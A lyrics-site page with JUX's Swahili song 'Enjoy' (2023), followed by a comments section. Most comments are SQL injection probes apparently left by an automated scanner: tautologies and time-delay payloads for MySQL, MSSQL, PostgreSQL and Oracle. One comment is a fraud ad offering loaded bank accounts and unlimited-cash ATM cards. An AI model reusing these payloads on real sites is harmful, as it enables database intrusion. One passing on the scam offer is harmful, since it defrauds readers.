Enjoy Lyrics by JUX


Hii leo
Acha tu niwaweke wazi
Mubaki na mishangao
Kuhusu haya mapenzi
Nataka kuyaeleza
Na leo
Tena wahiteni paparazi
Warushe kwa mitandao
Siyataki mapenzi
Nataka jipongeza
Unaemwita your baby
Kumbe nae ana baby
Ooh unaemwona kipenzi
Ni mshenzi hakupendi
Ama kweli mtihani
Mambo mengi duniani
Na mi stress siwezi
Ooooh siwezi aaahh

Bora ni Enjoy (Mmmmmh)
Maisha mafupi ni simple
Yanini niteseke roho
Jiunge nami upoze koo
Bora ni Enjoy
Maisha mafupi ni simple
Yanini niteseke roho (Ooh yanini yanini)
Jiunge nami upoze koo (Mmmh khoo khoo khoo khoo)

Kama kupendaaa
Bora nimpende mama yangu (Mmmh)
Kama kupendwaa mimi iih
Nitajipenda peke yangu (Ooooh)
Kilichoniponza ufala
Kujiona simba kumbe swala
Nikazama kwenye penzi uchwala
Badala ya kusaka miamala
Aiii yooooooo oh
Toka ni date pesa (Enhee)
Sa napendeza (Enhee)
Na tena naenjoy (Enhee)
Na wanangu ma homeboy (Enhee)
Ooooh account inasoma (Enhee)
Na kamwili kananona (Enhee)
We mwenyewe si unaona yani (Enhee)
Ai nasema boraaaa

Bora ni Enjoy (Piri pi pi pi pi pi pi)
Maisha mafupi ni simple (Kirii ka dakitka)
Yanini niteseke roho  (Yanini niteseke rohoo)
Jiunge nami upoze koo  (Jiunge na mimi ah)
Bora ni Enjoy (Piri pi pi pi pi pi pi)
Maisha mafupi ni simple (Kirii ka dakitka)
Yanini niteseke roho (Aaahh iyeeeeiiii ye)
Jiunge nami upoze koo (Jiunge na mimi ah)

Napenda nikilewa
Nipande juu ya meza
Minjonjo
Huku natema kiingereza
Tupande juu ya meza
Tupande juu ya meza
Tupande juu ya meza
Za za za za za

Bora ni Enjoy (Piri pi pi pi pi pi pi)
Maisha mafupi ni simple (Kirii ka dakitka)
Yanini niteseke roho (Ooh yanini yanini)
Jiunge nami upoze koo (Ooh khoo khoo khoo khoo)

Watch Video

About Enjoy

Album : Enjoy (Single)
Release Year : 2023
Copyright : © 2023 AFRICAN BOY REC
Added By : Farida
Published : Jul 14 , 2023

More JUX Lyrics

Comments ( 35 )

.
2024-07-25 16:27:46

555

.
2024-07-25 16:27:53

555

.
2024-07-25 16:27:55

555

.
2024-07-25 16:29:09

555

.
2024-07-25 16:29:12

555

.
2024-07-25 16:29:14

-1 OR 2+112-112-1=0+0+0+1 --

.
2024-07-25 16:29:14

-1 OR 3+112-112-1=0+0+0+1 --

.
2024-07-25 16:29:17

-1 OR 2+575-575-1=0+0+0+1

.
2024-07-25 16:29:17

-1 OR 3+575-575-1=0+0+0+1

.
2024-07-25 16:29:19

-1' OR 2+744-744-1=0+0+0+1 --

.
2024-07-25 16:29:20

-1' OR 3+744-744-1=0+0+0+1 --

.
2024-07-25 16:29:21

-1' OR 2+511-511-1=0+0+0+1 or 'dECMzyCp'='

.
2024-07-25 16:29:22

-1' OR 3+511-511-1=0+0+0+1 or 'dECMzyCp'='

.
2024-07-25 16:29:25

-1" OR 2+553-553-1=0+0+0+1 --

.
2024-07-25 16:29:28

-1" OR 3+553-553-1=0+0+0+1 --

.
2024-07-25 16:29:31

if(now()=sysdate(),sleep(15),0)

.
2024-07-25 16:29:33

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

.
2024-07-25 16:29:34

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

.
2024-07-25 16:29:36

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

.
Quick Hack 2024-06-08 15:35:20

do you want to make quick money? i load bank accounts any amounts upto 100 millions dollars,  i can load also cash app,   any amounts,   i have also an ATM card that i give you, to withdrew unlimited amount of Free money , it has a daily limit of 50,000 dollars and it has 2 years expiry date.  email me quickhack65 at g mail com

.
2024-07-25 16:29:37

-1; waitfor delay '0:0:15' --

.
2024-07-25 16:29:38

-1); waitfor delay '0:0:15' --

.
2024-07-25 16:29:40

1 waitfor delay '0:0:15' --

.
2024-07-25 16:29:41

Xl5MINx4'; waitfor delay '0:0:15' --

.
2024-07-25 16:29:43

-5 OR 201=(SELECT 201 FROM PG_SLEEP(15))--

.
2024-07-25 16:29:49

-5) OR 813=(SELECT 813 FROM PG_SLEEP(15))--

.
2024-07-25 16:29:49

-1)) OR 135=(SELECT 135 FROM PG_SLEEP(15))--

.
2024-07-25 16:29:50

1Ha5MWfM' OR 718=(SELECT 718 FROM PG_SLEEP(15))--

.
2024-07-25 16:29:52

EA3ggEM8') OR 605=(SELECT 605 FROM PG_SLEEP(15))--

.
2024-07-25 16:29:53

wcDU0zJy')) OR 859=(SELECT 859 FROM PG_SLEEP(15))--

.
2024-07-25 16:29:54

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

.
2024-07-25 16:29:55

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

.
2024-07-25 16:29:56

1'"

.
2024-07-25 16:30:02

1????%2527%2522

.
2024-07-25 16:30:07

@@rYHaw



About AfrikaLyrics

Afrika Lyrics is the most diverse collection of African song lyrics and translations. Afrika Lyrics provides music lyrics from over 30 African countries and lyrics translations from over 10 African Languages into English and French

Follow Afrika Lyrics

© 2024, We Tell Africa Group Sarl